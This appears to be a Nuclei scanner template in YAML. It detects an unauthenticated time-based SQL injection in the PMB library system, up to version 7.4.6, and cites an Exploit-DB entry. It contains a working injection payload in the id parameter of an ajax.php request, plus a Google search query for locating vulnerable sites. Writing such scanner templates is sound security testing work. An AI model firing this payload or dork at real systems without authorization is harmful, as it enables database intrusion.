nuclei-templates/http/vulnerabilities/other/pmb-sqli.yaml

35 lines
1.2 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: pmb-sqli
info:
name: PMB <= 7.4.6 - SQL Injection
author: r3Y3r53
severity: high
description: |
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs.
reference:
- https://www.exploit-db.com/exploits/51197
- https://vulners.com/exploitdb/EDB-ID:51197
metadata:
verified: true
max-request: 1
google-query: inurl:"opac_css"
2023-10-17 07:20:28 +00:00
tags: sqli,unauth,pmb
http:
- raw:
- |
@timeout: 15s
GET /pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined HTTP/2
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(content_type, "text/html")'
- 'contains(header, "PmbOpac")'
- 'duration>=5'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450221008299918384df65ef135c2cf642f0f8193985806ecaa0a4e6ef25307e1103927202203973bf9b8474ba3a26e0ece1efb52cde0a21019803714901e3bc621be187b0ca:922c64590222798bb761d5b6d8e72950